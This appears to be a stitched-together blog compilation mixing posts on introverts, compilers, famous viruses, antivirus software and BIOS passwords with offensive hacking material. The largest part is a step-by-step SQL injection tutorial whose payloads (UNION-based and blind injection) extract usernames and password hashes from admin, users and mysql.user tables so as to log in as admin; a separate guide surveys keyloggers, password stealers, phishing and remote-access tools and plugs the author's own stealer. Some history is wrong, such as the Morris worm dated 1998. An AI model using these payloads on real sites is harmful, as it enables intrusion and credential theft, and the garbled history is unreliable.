How to be friends with Introverts?

Ever wondered why that person always stands quiet and alone in one corner while the rest of them party? Why doesn't s/he like to enjoy life like the normal folks?


Nothing is wrong with them. Such people represent that small section (20-25%) of our society who are known as introverts.

Their are many myths about such people in our society. For those who think that such people are shy, antisocial, arrogant, rude or dumb, its is not so.

So what are they?

They are just normal people who have their own world within their minds which they find more pleasing than the outer world.
Those who think they don't like talking, try talking to them about something that interests them. You'll be surprised to see how much talkative they can be.
If you think these people are not amiable, look a bit closely into their life. They have a few friends whom they consider to be priceless.
They dislike big groups and prefer to stay alone. This refreshes them and gives time to think or daydream or whatever you prefer to call it. This time is vital for them since they live in their inner world during these moment.
It is not that they don't like to go out and enjoy. The fact is they don't like staying out for a long time. They'd prefer to go out, complete their task and return as soon as possible. Enjoyment for them is the time they spend in solitude thinking deeply about what interests them.

So how do we befriend them? They don't like speaking at all!!
Take time to get close to them. Don't try to force them to speak. Try to communicate with them non-verbally (sending sms, chatting online, etc.), or talk with them when you are alone. This kind of communication makes them feel more comfortable since they get better time to think while the conversation goes on. Try to know what they are interested in. Try talking on that topic instead to the usual small talk. Gradually this person you want to be friends with will get closer to you. You may feel uncomfortable because of their silence in the beginning. But when you befriend him/her finally, you'll have gained an ally for a lifetime (since these people value the people in their small circle of friends much more than the extroverts).

I hope you enjoyed reading the above article.
Thankyou.

Scripting Language vs. Programming Language

Scripting languages are languages that allow you to send commands directly to a system that executes these commands. These commands are read line by line and executed. An error is issued when a line cannot be executed for any reason (wrong syntax, illegal operation,...). e.g. Python, shell-script, Matlab

Programming languages are languages that allow you to create a program by writing structured code that is read all at once by the system, checked for errors, and translated into an unreadable format that the machine can then execute. e.g. Java, C/C++, Visual Basic...

Programming languages are generally faster in execution than scripting languages but are often more difficult to use and have more rigid syntax. You can generally use either of them to do pretty much anything, though each is more suited for specific applications.

Compiler and Interpreter

A Compiler and Interpreter both carry out the same purpose – convert a high level language (like C, Java) instructions into the binary form which is understandable by computer hardware. They are the software used to execute the high level programs and codes to perform various tasks. Specific compilers/interpreters are designed for different high level languages. However both compiler and interpreter have the same objective but they differ in the way they accomplish their task i.e. convert high level language into machine language. Through this article we will talk about the basic working of both and distinguish the basic difference between compiler and interpreter.

Compiler

A compiler is a piece of code that translates the high level language into machine language. When a user writes a code in a high level language such as Java and wants it to execute, a specific compiler which is designed for Java is used before it will be executed. The compiler scans the entire program first and then translates it into machine code which will be executed by the computer processor and the corresponding tasks will be performed.  

Shown in the figure is basic outline of the compilation process, here program written in higher level language is known as source program and the converted one is called object program.

Interpreter

Interpreters are not much different than compilers. They also convert the high level language into machine readable binary equivalents. Each time when an interpreter gets a high level language code to be executed, it converts the code into an intermediate code before converting it into the machine code. Each part of the code is interpreted and then execute separately in a sequence and an error is found in a part of the code it will stop the interpretation of the code without translating the next set of the codes.  

Outlining the basic working of the interpreter the above figure shows that first a source code is converted to an intermediate form and then that is executed by the interpreter.

The main differences between compiler and interpreter are listed below:

·         The interpreter takes one statement then translates it and executes it and then takes another statement. While the compiler translates the entire program in one go and then executes it.

·         Compiler generates the error report after the translation of the entire page while an interpreter will stop the translation after it gets the first error.

·         Compiler takes a larger amount of time in analyzing and processing the high level language code comparatively interpreter takes lesser time in the same process.

·         Besides the processing and analyzing time the overall execution time of a code is faster for compiler relative to the interpreter.

Source engineersgarage.com

Top 10 worst computer viruses in history

Malicious software, worms, Trojans and computer viruses are on the increase, say security experts, as hackers, spammers and identity thieves seek new ways to steal information that can be used to empty bank accounts or spread electronic mayhem. Here, we present a look back at the 10 worst computer viruses of ever made

1. The Morris worm

In 1998 Robert Morris, a university student, unleashed a worm which affected 10 per cent of all the computers connected to the internet (at the time the net was estimated to consist of 60,000 computers), slowing them down to a halt. Morris is now an associate professor at MIT.

2. The Concept virus

The Concept virus, accidentally shipped on a CD-ROM supplied by Microsoft in 1995, was the first virus to infect Microsoft Word documents. Within days it became the most widespread virus the world had ever seen, taking advantage of the fact that computer users shared documents via email.

3. CIH
The Chernobyl virus (also known as CIH) triggers on April 26 each year, the anniversary of the Chernobyl nuclear disaster. It overwrites a chip inside PCs effectively paralysing the entire computer. Its author, Chen Ing Hau, was caught by the authorities in Taiwan.

4. The Anna Kournikova worm
The Anna Kournikova worm posed as a picture of the tennis player, but was in fact a virus written by Jan de Wit, an obsessed admirer from the Netherlands. He ended up receiving a community service sentence.

5. ILOVEYOU
The Love Bug flooded internet users with ILOVEYOU messages in May 2000, forwarding itself to everybody in the user's address book. It was designed to steal internet access passwords for its Filipino creator.

6. The Melissa virus
The Melissa virus, written by David L Smith in homage to a Florida stripper, was the first successful email-aware virus and inserted a quote from The Simpsons in to Word documents. Smith was later sentenced to jail for causing over $80 million worth of damage.

7. The Blaster Worm
The Blaster worm launched a denial of service attack against Microsoft's website in 2003, and infected millions of computers around the world by exploiting a security hole in Microsoft's software. Its author has never been found.

8. Netsky and Sasser
Sven Jaschan, a German teenager, was found guilty of writing the Netsky and Sasser worms. Jaschan was found to be responsible for 70 per cent of all the malware seen spreading over the internet at the time, but escaped prison and was eventually hired by a security company as an "ethical hacker".

9. OSX/RSPlug Trojan
In November 2007, the first example of financially-motivated malware for Apple Macs was discovered in the wild. The launch of the OSX/RSPlug Trojan increased fears that Apple's platform may be targeted more by hackers in the future.

10. Storm worm
The Storm worm, originally posing as breaking news of bad weather hitting Europe, infected computers around the world in 2007. Millions of infected PCs were taken over by hackers and used to spread spam and steal identities.

Source : telegraph .co.uk

How do anti-virus softwares work

How does anti-virus software work?

An anti-virus software program is a computer program that can be used to scan files to identify and eliminate computer viruses and other malicious software (malware).
Anti-virus software typically uses two different techniques to accomplish this:

• Examining files to look for known viruses by means of a virus dictionary
• Identifying suspicious behavior from any computer program which might indicate infection

Most commercial anti-virus software uses both of these approaches, with an emphasis on the virus dictionary approach.
Virus dictionary approach
In the virus dictionary approach, when the anti-virus software examines a file, it refers to a dictionary of known viruses that have been identified by the author of the anti-virus software. If a piece of code in the file matches any virus identified in the dictionary, then the anti-virus software can then either delete the file, quarantine it so that the file is inaccessible to other programs and its virus is unable to spread, or attempt to repair the file by removing the virus itself from the file.
To be successful in the medium and long term, the virus dictionary approach requires periodic online downloads of updated virus dictionary entries. As new viruses are identified "in the wild", civically minded and technically inclined users can send their infected files to the authors of anti-virus software, who then include information about the new viruses in their dictionaries.
Dictionary-based anti-virus software typically examines files when the computer's operating system creates, opens, and closes them; and when the files are e-mailed. In this way, a known virus can be detected immediately upon receipt. The software can also typically be scheduled to examine all files on the user's hard disk on a regular basis.
Although the dictionary approach is considered effective, virus authors have tried to stay a step ahead of such software by writing "polymorphic viruses", which encrypt parts of themselves or otherwise modify themselves as a method of disguise, so as to not match the virus's signature in the dictionary.
Suspicious behavior approach
The suspicious behavior approach, by contrast, doesn't attempt to identify known viruses, but instead monitors the behavior of all programs. If one program tries to write data to an executable program, for example, this is flagged as suspicious behavior and the user is alerted to this, and asked what to do.
Unlike the dictionary approach, the suspicious behavior approach therefore provides protection against brand-new viruses that do not yet exist in any virus dictionaries. However, it also sounds a large number of false positives, and users probably become desensitized to all the warnings. If the user clicks "Accept" on every such warning, then the anti-virus software is obviously useless to that user. This problem has especially been made worse over the past 7 years, since many more nonmalicious program designs chose to modify other .exes without regards to this false positive issue. Thus, most modern anti virus software uses this technique less and less.
Other ways to detect viruses
Some antivirus-software will try to emulate the beginning of the code of each new executable that is being executed before transferring control to the executable. If the program seems to be using self-modifying code or otherwise appears as a virus (it immeadeatly tries to find other executables), one could assume that the executable has been infected with a virus. However, this method results in a lot of false positives.
Yet another detection method is using a sandbox. A sandbox emulates the operating system and runs the executable in this simulation. After the program has terminated, the sandbox is analysed for changes which might indicate a virus. Because of performance issues this type of detection is normally only performed during on-demand scans.
Issues of concern
Macro viruses, arguably the most destructive and widespread computer viruses, could be prevented far more inexpensively and effectively, and without the need of all users to buy anti-virus software, if Microsoft would fix security flaws in Microsoft Outlook and Microsoft Office related to the execution of downloaded code and to the ability of document macros to spread and wreak havoc.
User education is as important as anti-virus software; simply training users in safe computing practices, such as not downloading and executing unknown programs from the Internet, would slow the spread of viruses, without the need of anti-virus software.
Computer users should not always run with administrator access to their own machine. If they would simply run in user mode then some types of viruses would not be able to spread.
The dictionary approach to detecting viruses is often insufficient due to the continual creation of new viruses, yet the suspicious behavior approach is ineffective due to the false positive problem; hence, the current understanding of anti-virus software will never conquer computer viruses.
There are various methods of encrypting and packing malicious software which will make even well-known viruses undetectable to anti-virus software. Detecting these "camouflaged" viruses requires a powerful unpacking engine, which can decrypt the files before examining them. Unfortunately, many popular anti-virus programs do not have this and thus are often unable to detect encrypted viruses.
Companies that sell anti-virus software seem to have a financial incentive for viruses to be written and to spread, and for the public to panic over the threat.
This article is licensed under the GNU Free Documentation License. It uses material from the Wikipedia article "Anti-virus software".

Setting a BIOS Password

Make your computer ask for a password without installing anything.

Your computers BIOS is the first program that is run when your computer starts. You can tell the BIOS to ask for a password when it starts, thus restricting access to your computer.

To enter the BIOS setup program, sometimes called CMOS setup:

Turn on or reboot your computer. The screen will display a series of diagnostics and a memory check.
A message like "Hit the <DEL> key to enter the BIOS setup program" will appear.
When you do hit DEL at the right time[1] you'll see a menu screen something like this:


Note: Some BIOS versions use a graphical type menu with icons (a GUI) or have a text interface that appears differt to the one shown, the principle however is exactly the same.
As you can see there are two options that relate to passwords, Supervisor Password and User Password, these relate to controlling access to the BIOS Setup Program and the Machine Boot respectively.
Note that not all BIOS's have this password feature, your bios may not have it in which case you won't be able to restrict access to your computer in this way.
Select USER PASSWORD and you'll be prompted to enter a password:
You should now enter a password of up to eight characters (most BIOS's are limited to eight characters unfortunately).  I recommend you use the full eight but take care that you choose something you'll not forget, for help choosing passwords see here.
The BIOS will then prompt you to confirm the password, just type the same thing again.
Now you'll want to set your system to ask for that password every time it boots, so select the BIOS FEATURES SETUP option, to see a menu something like this:
Fairly obviously, it's the Password Check option we're interested in, so select it and change the setting to ALWAYS.
Now navigate back to the main menu and select SAVE & EXIT SETUP.  Your machine will then reboot and you'll be prompted for the password.
Each and every time you boot you'll be asked for password you chose.
Please note that this method of restricting access to your computer is not completely foolproof, there are ways around it. But it will stop or at least delay the majority of casual attempts to get access.

If you forget your BIOS password, consult your motherboard manual or if you don't have one, consult the website of the BIOS manufacturer.
[1] It's not always the DEL key some BIOS's use F2 or F10 or anothother key combination, check your motherboard manual.

Introduction to Hacking Email or any Website Accounts

A Guide by The 7th Sage

Ok now that you have my attention :lp: Please read this guide that will burst your bubble, beginner hackers. I am sorry for that.


You CANNOT hack emails or websites with just one or two clicks with some email hacking apps. You need to have proper information about the person that you are hacking. If you see sites that claim that they can hack email accounts within minutes and charge hundreds of dollars for it, just laugh at them and move on. Do not waste money on them as they will be just scamming you.

There are two ways to hack Accounts of a Website.

Client Side Hacking

This method can be done depending what you choose. Client side hacking is basically hacking the person's pc and extract information. Antiviruses will detect the apis, assemblies, etc and prevent you from infecting them. In this case you need

1) Keylogging : This basically taps all the keystrokes that users type. When user types password you get it. The victim requires to execute the keylogger "server" file in order to be infected.

2) Password Stealing : Here you steal password saved on user's pc. Browsers often save passwords to provide quick login to the user, but this can be harmful sometimes. Here same as keyloggers you need to execute a file on client pc. You can use combination of keylogger and password stealers, such as my Emissary Keylogger/Stealer.

3) Cookie Stealing : Here you are stealing cookies of the user. Cookies can be used to auto login as they hold information about the account.

4) Remote Administration Tools : These tools are very dangerous and give you full control of a computer. You can view webcams, desktops live, transfer and download files.

5) Social Engineering : Social Engineering is nothing but fooling someone to download your malware or extracting sensitive information from them.
One of the methods is this : Hacking Accounts through SE.


6) Phishing Attacks : Phishing is creating fake login pages similar to that of a website's login page and then fooling the person to enter their username and password into the login box. The triggered php scripts shall send the entered passwords to your log file.

7) Zombies/Bots : This is like keylogging and pass stealing if victim executes your malware he she can be infected with a bot. A bot will connect them to your irc channel or host server and make them your "Zombie". You can do whatever you want with them.

That covers the client part.


Server Side Hacking


1) Exploiting : Exploiting means finding a vulnerability and using it to your advantage. There are various publically disclosed vulnerabilities and exploits that you can simply search on google and HC. There are ways to exploit a server the most common ones are

1) XSS Cross Site Scripting,
2) RFI, LFI
3) Uploading Shells
4) SQL Injections
5) CSRF
6) Gaining Root Access to websites hosted on the same server and then intruding another site on the server.
7) Using Scripts to gain information known as Exploits.

These methods are very vast and cannot be explained in a few lines so I am not explaining them in this guide.


2) Bruteforce Attack : Bruteforcing is using a bruteforcer software to try combinations of words, numbers and symbols to fetch the login of your victim. But this rarely works and you need to have a powerful computer.

3) Reverting Accounts : Here we are fooling the website servers that we are the authorized user and we are the holder of an account. One of this vulnerability exists in Hotmail and existed in Facebook. Users just supplied some information about the clients such as last accessed ip address, contacts on contact list, date of birth, location, etc. With a bit of SE its not that hard to extract such information from the client.

That covers most of the basics of Email/Website Account "Hacking". Hope you don't buy into any of the bullshit after reading this guide.


Thank You, for reading.

Solixia - Hiding a file inside an Image File

Solixia is a software used to hide any binary/text file inside the pixels of an image file. A highly undetectable steganography technique is used to accomplish this task and your hidden files cannot be viewed by anybody at all. Only Solixia can extract the hidden file from the image. So your files are secure from external tampering if you use Solixia to hide it.

Download Link : Solixia v1.3

All Web Application Hacking Methods

Parameter manipulation

* Arbitary File Deletion
* Code Execution
* Cookie Manipulation ( meta http-equiv & crlf injection )
* CRLF Injection ( HTTP response splitting )
* Cross Frame Scripting ( XFS )
* Cross-Site Scripting ( XSS )
* Directory traversal
* Email Injection
* File inclusion
* Full path disclosure
* LDAP Injection
* PHP code injection
* PHP curl_exec() url is controlled by user
* PHP invalid data type error message
* PHP preg_replace used on user input
* PHP unserialize() used on user input
* Remote XSL inclusion
* Script source code disclosure
* Server-Side Includes (SSI) Injection
* SQL injection
* URL redirection
* XPath Injection vulnerability
* EXIF



This list below fits in category MultiRequest parameter manipulation

* Blind SQL injection (timing)
* Blind SQL/XPath injection (many types)



This list below fits in category File checks

* 8.3 DOS filename source code disclosure
* Search for Backup files
* Cross Site Scripting in URI
* PHP super-globals-overwrite
* Script errors ( such as the Microsoft IIS Cookie Variable Information Disclosure )



This list below fits in category Directory checks

* Cross Site Scripting in path
* Cross Site Scripting in Referer
* Directory permissions ( mostly for IIS )
* HTTP Verb Tampering ( HTTP Verb POST & HTTP Verb WVS )
* Possible sensitive files
* Possible sensitive files
* Session fixation ( jsessionid & PHPSESSID session fixation )
* Vulnerabilities ( e.g. Apache Tomcat Directory Traversal, ASP.NET error message etc )
* WebDAV ( very vulnerable component of IIS servers )



This list below fits in category Text Search Disclosure

* Application error message
* Check for common files
* Directory Listing
* Email address found
* Local path disclosure
* Possible sensitive files
* Microsoft Office possible sensitive information
* Possible internal IP address disclosure
* Possible server path disclosure ( Unix and Windows )

The Hacker's Manifesto

by
+++The Mentor+++
Written January 8, 1986




Another one got caught today, it's all over the papers. "Teenager Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"...

Damn kids. They're all alike.

But did you, in your three-piece psychology and 1950's technobrain, ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him?

I am a hacker, enter my world...

Mine is a world that begins with school... I'm smarter than most of the other kids, this crap they teach us bores me...

Damn underachiever. They're all alike.

I'm in junior high or high school. I've listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. "No, Ms. Smith, I didn't show my work. I did it in my head..."

Damn kid. Probably copied it. They're all alike.

I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me.. Or thinks I'm a smart ass.. Or doesn't like teaching and shouldn't be here...

Damn kid. All he does is play games. They're all alike.

And then it happened... a door opened to a world... rushing through the phone line like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought... a board is found. "This is it... this is where I belong..." I know everyone here... even if I've never met them, never talked to them, may never hear from them again... I know you all...

Damn kid. Tying up the phone line again. They're all alike...

You bet your ass we're all alike... we've been spoon-fed baby food at school when we hungered for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us willing pupils, but those few are like drops of water in the desert.

This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals.

Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.

I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike.

Where to begin with hacking

I have seen a lot of people asking for a tutorial on "where to begin with hacking". So here is my opinion about how they should get around starting.
 
 There are three types of hackers:

 White Hats:

 The White Hat hacker has dedicated himself to fight malware and help others with their computer problems. He is a person you can trust, and he will most likely end up in a good paying job as a computer programmer or a security consultant. He will most certainly not end up in jail.

 Grey Hats:

 The Grey Hat hacker are in between white Hats and Black Hats. He will most likely commit pranks at people that he thinks is harmless, but it can also be illegal. He can at one time be helpful and help you with a computer problem, but at the same time infect you with his own virus. There is a chance that the grey hat will end up in prison.
 
 Black Hats:

 The Black hat hacker also known as a cracker is the one who deface websites, steal private information and such illegal activity. It is very time consuming to become a black hat. It can be very hard for them to get a job because of the illegal activity. If law enforcements gets you, you can expect jail time.

 So where to start?

 You should know the answer to these questions before you start your hacking career.

• Which type of hacker do you want to be (white hat, grey hat or black hat)?
• Which type of hacking do you want to work with (website hacking, system exploits, pentesting etc.)?
• What is your end-goal?

 You should meet these requirements to become a successful hacker.

• You shall be patient.
• You shall dedicate a lot of time to hacking. You will never stop learning, since hacking is a lifestyle.
• You should have a computer (I expect you to have one since you are reading this).
• You shall be interested in how the different computer systems works, and how to control them.

 Now that you have an idea of what kind of hacker, you want to be we will look closer into the different topics you can work with as a hacker.

 
 Website Hacking:

 You properly already guessed it, but website hacking is about hacking websites. You use your skills to find exploits and vulnerabilities in websites and web applications. Almost all major hacking stories in the news are about websites and databases that have been hacked. Once you have enough experience in website security you will be amazed about how easy it is to find vulnerabilities in websites. However, it will take a lot of effort and time to reach that level of skills. You will need to know a large amount of server-side languages and website construction languages like PHP, HTML, JavaScript, SQL, ASP, ASP.NET and Perl. This was just some of the languages you should know about. I will recommend you to take JavaScript, SQL and PHP very serious since it is in those languages you will find the most vulnerabilities.



 Pen testing and Forensics:

 Pen testing and forensics can earn you big money. It is these guys the company’s call when they have been hacked. They are experts in operating systems, wireless connections and exploiting computers. This way will take A LOT of time and effort since there is so much you should know about. You shall know about how the different operating systems works, which exploit there is to them, how to exploit them, routers, encryption, malware etc. the list is almost endless.



 Code exploiting:

 Not many people know about this. This will require you to be a complete expert at programming. You shall be at least as good at these programming languages as your main language like English. This kind of hacking is taking a lot of time, and will require you to be patient. Do not get me wrong, every company that releases software like Symantec, Google, Microsoft, Adobe, and Oracle have hackers with these skills employed to check their software for vulnerabilities. Sadly, they cannot find every security hole and therefore some very smart black hat hackers are able to find them, and exploit them before the companies get the vulnerability patched. You should know the most popular languages like C++, Java and C etc.



 Computer security:

 The work these people do looks a lot like the pentesters. These people is able to detect and analyze new viruses and malware. They are working for companies like Symantec, KasperSky and Avira etc. Some of them are also working on labs that tests AV’s and new viruses. They are experts in how viruses works and how they infect systems.



 
 You should now have an idea on where to start and in which direction you want to go. If you found any errors or typos feel free to contact me, and I will look into it. I will be updating this thread recently and add more details. I will soon add a dictionary, which explains the most basic hacking terms. I have putted a lot of effort in this tutorial and my goal with this tutorial is to give computer-interested people an idea of where they should start.
 
 To the so-called “noobs”, who reads this:

 I hope I have inspired you to begin at hacking. I hope that I have cleared things up a little bit, so it does not seem so messy anymore. If you have any questions or something you did not understand, I would gladly explain it to you again. Welcome to the hacker’s world, a new world will open up for you and you will never regret that you chose to become a hacker.

Source : Evilzone

Complete SQL Injection Tutorial

Author: Marezzi

In this tutorial i will describe how sql injection works and how to use it to get some useful information.


First of all: What is SQL injection?

It's one of the most common vulnerability in web applications today. It allows attacker to execute database query in url and gain access to some confidential information etc...(in shortly).

1.SQL Injection (classic or error based or whatever you call it)
2.Blind SQL Injection (the harder part)


So let's start with some action

1). Check for vulnerability

Let's say that we have some site like this

http://www.site.com/news.php?id=5

Now to test if is vulnerable we add

'

to the end of url and that would be

http://www.site.com/news.php?id=5'

so if we get some error like

"You have an error in your SQL syntax; check the manual that 

corresponds to your MySQL server version for the right etc..."

or something similar, that means is vulnarable to sql injection
2). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result). So how to use it? Well just incrementing the number until we get an error.

http://www.site.com/news.php?id=5 order by 1/* <-- no error

http://www.site.com/news.php?id=5 order by 2/* <-- no error

http://www.site.com/news.php?id=5 order by 3/* <-- no error

http://www.site.com/news.php?id=5 order by 4/* <-- error (we get message

like this Unknown column '4' in 'order clause' or something like that)

that means that the it has 3 columns, cause we got an error on 4.

3). Check for UNION function

With union we can select more data in one sql statement.

so we have

http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already

found that number of columns are 3 in section 2). )

If we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works
4). Check for MySQL version

http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if 

/* not working or you get some error, then try --

it's a comment and it's important for our query to work properly.

let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.

it should look like this

 http://www.site.com/news.php?id=5 union all select 1,@@version,3/*

If you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."

I didn't see any paper covering this problem, so I must write it what we need is convert() function i.e.

http://www.site.com/news.php?id=5 union all select 1,convert(@@version

using latin1),3/*

or with hex() and unhex() i.e.

http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),

3/*

and you will get MySQL version

5). Getting table and column name

well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) <--- later i will describe for MySQL > 5 version.
we must guess table and column name in most cases.
common table names are: user/s, admin/s, member/s ...
common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...
i.e would be

http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/*

(we see number 2 on the screen like before, and that's good )

we know that table admin exists...
now to check column names.

http://www.site.com/news.php?id=5 union all select 1,username,3 from

admin/* (if you get an error, then try the other column name) 

we get username displayed on screen, example would be admin, or superadmin etc...

now to check if column password exists

http://www.site.com/news.php?id=5 union all select 1,password,3 from

admin/* (if you get an error, then try the other column name)

we seen password on the screen in hash or plain-text, it depends of how the database is set up
i.e md5 hash, mysql hash, sha1...

now we must complete query to look nice
for that we can use concat() function (it joins strings)

i.e

http://www.site.com/news.php?id=5 

union all select 1,concat(username,0x3a,password),3 from admin/*

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)

(there is another way for that, char(58), ascii value for : )

http://www.site.com/news.php?id=5 

union all select 1,concat(username,char(58),password),3 from admin/*

now we get dislayed username:password on screen, i.e admin:admin or admin:somehash

when you have this, you can login like admin or some superuser
if can't guess the right table name, you can always try mysql.user (default)

it has user i password columns, so example would be

http://www.site.com/news.php?id=5 

union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

Like i said before i'm gonna explain how to get table and column names
in MySQL > 5.

For this we need information_schema. It holds all tables and columns in database.

to get tables we use table_name and information_schema.tables.

i.e

http://www.site.com/news.php?id=5 

union all select 1,table_name,3 from information_schema.tables/*

here we replace the our number 2 with table_name to get the first table from information_schema.tables

displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.

i.e

http://www.site.com/news.php?id=5 

union all select 1,table_name,3 from information_schema.tables limit 0,

1/*

note that i put 0,1 (get 1 result starting from the 0th)

now to view the second table, we change limit 0,1 to limit 1,1

i.e

http://www.site.com/news.php?id=5 

union all select 1,table_name,3 from information_schema.tables limit 1,

1/*

the second table is displayed.

for third table we put limit 2,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3

from information_schema.tables limit 2,1/*

keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc...
To get the column names the method is the same.

here we use column_name and information_schema.columns

the method is same as above so example would be

http://www.site.com/news.php?id=5 

union all select 1,column_name,3 from information_schema.columns limit 0,1/*

the first column is diplayed.

the second one (we change limit 0,1 to limit 1,1)

ie.

http://www.site.com/news.php?id=5 

union all select 1,column_name,3 from information_schema.columns limit 1,1/*

the second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc...
if you wanna display column names for specific table use this query. (where clause)

let's say that we found table users.

i.e

http://www.site.com/news.php?id=5 

union all select 1,column_name,3 from 

information_schema.columns where table_name='users'/*

now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.

Note that this won't work if the magic quotes is ON.

let's say that we found colums user, pass and email.

now to complete query to put them all together
for that we use concat() , i decribe it earlier.

i.e

http://www.site.com/news.php?id=5 

union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*

what we get here is user:pass:email from table users.

example: admin:hash:whatever@blabla.com

That's all in this part, now we can proceed on harder part

2. Blind SQL Injection

Blind injection is a little more complicated the classic injection but it can be done
I must mention, there is very good blind sql injection tutorial by xprog, so it's not bad to read it
Let's start with advanced stuff.

I will be using our example

http://www.site.com/news.php?id=5

when we execute this, we see some page and articles on that page, pictures etc...

then when we want to test it for blind sql injection attack

http://www.site.com/news.php?id=5 and 1=1 <--- this is always true

and the page loads normally, that's ok.

now the real test

http://www.site.com/news.php?id=5 and 1=2 <--- this is false

so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.

1) Get the MySQL version

to get the version in blind attack we use substring

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

this should return TRUE if the version of MySQL is 4.

replace 4 with 5, and if query return TRUE then the version is 5.

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works

when select don't work then we use subselect

i.e

http://www.site.com/news.php?id=5 and (select 1)=1

if page loads normally then subselects work.

then we gonna see if we have access to mysql.user

i.e

http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1

)=1

if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.

3). Check table and column names

This is part when guessing is the best friend
i.e.

http://www.site.com/news.php?id=5 and 

(select 1 from users limit 0,1)=1 

(with limit 0,1 our query here returns 1 row of data, cause subselect

 returns only 1 row, this is very important.)

then if the page loads normally without content missing, the table users exits.
if you get FALSE (some article missing), just change table name until you guess the right one
let's say that we have found that table name is users, now what we need is column name.

the same as table name, we start guessing. Like i said before try the common names for columns.

i.e

http://www.site.com/news.php?id=5 and 

(select substring(concat(1,password),1,1) from users limit 0,1)=1

if the page loads normally we know that column name is password (if we get false then try common names or just guess)

here we merge 1 with the column password, then substring returns the first character (,1,1)

4). Pull data from database

we found table users i columns username password so we gonna pull characters from that.

http://www.site.com/news.php?id=5 and 

ascii(substring((SELECT concat(username,0x3a,password) 

from users limit 0,1),1,1))>80

ok this here pulls the first character from first user in table users.

substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value

and then compare it with simbol greater then > .

so if the ascii char greater then 80, the page loads normally. (TRUE)

we keep trying until we get false.

http://www.site.com/news.php?id=5 and 

ascii(substring((SELECT concat(username,0x3a,password) 

from users limit 0,1),1,1))>95

we get TRUE, keep incrementing

http://www.site.com/news.php?id=5 and 

ascii(substring((SELECT concat(username,0x3a,password) from 

users limit 0,1),1,1))>98

TRUE again, higher

http://www.site.com/news.php?id=5 and 

ascii(substring((SELECT concat(username,0x3a,password) from 

users limit 0,1),1,1))>99

FALSE!!!

so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.

then let's check the second character.

http://www.site.com/news.php?id=5 and 

ascii(substring((SELECT concat(username,0x3a,password) from users 

limit 0,1),2,1))>99

Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)

http://www.site.com/news.php?id=5 and 

ascii(substring((SELECT concat(username,0x3a,password) from 

users limit 0,1),1,1))>99

TRUE, the page loads normally, higher.

http://www.site.com/news.php?id=5 and 

ascii(substring((SELECT concat(username,0x3a,password) from 

users limit 0,1),1,1))>107

FALSE, lower number.

http://www.site.com/news.php?id=5 and ascii(substring

((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104

TRUE, higher.

http://www.site.com/news.php?id=5 and ascii(substring

((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105

FALSE!!!

we know that the second character is char(105) and that is 'i'. We have 'ci' so far

so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).

There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing everything manually, cause that makes you better SQL INJECTOR

Hope you learned something from this paper.

Have FUN! (:

XPath Injection Attacks Methodology and Examples.

PREREQUISITE -
- Basic Programming Skills and Data manipulation in XML (Extensible Markup Language) and XPath.
- Basic Knowledge of Web Applications\' Input Vulnerabilities and Sanitisation Methods
- Beginner level Understanding of Client/Server Communication Protocol and Authentication Procedure

SUGGESTED KNOWLEDGE -
- Intermediated Understanding of ASP.NET, JAVA and/or C# Code and Web Programming

PURPOSE -
- Attack used to Extract data from XML Databases/documents
- Manipulate Data from local/remote location to Server (Victim)


DEFINITIONS -

[1]\"XPath injection is an attack targeting Web sites that create XPath queries from user-supplied data. If an application embeds unprotected data into an XPath query, the query can be altered so that it is no longer parsed in the manner originally intended. This can be done by bypassing the Web site authentication system and extracting the structure of one or more XML documents in the site.\"

[2]\"XPath 1.0 is a language used to refer to parts of an XML document. It can be used directly by an application to query an XML document, or as part of a larger operation such as applying an XSLT transformation to an XML document, or applying an XQuery to an XML document.\"


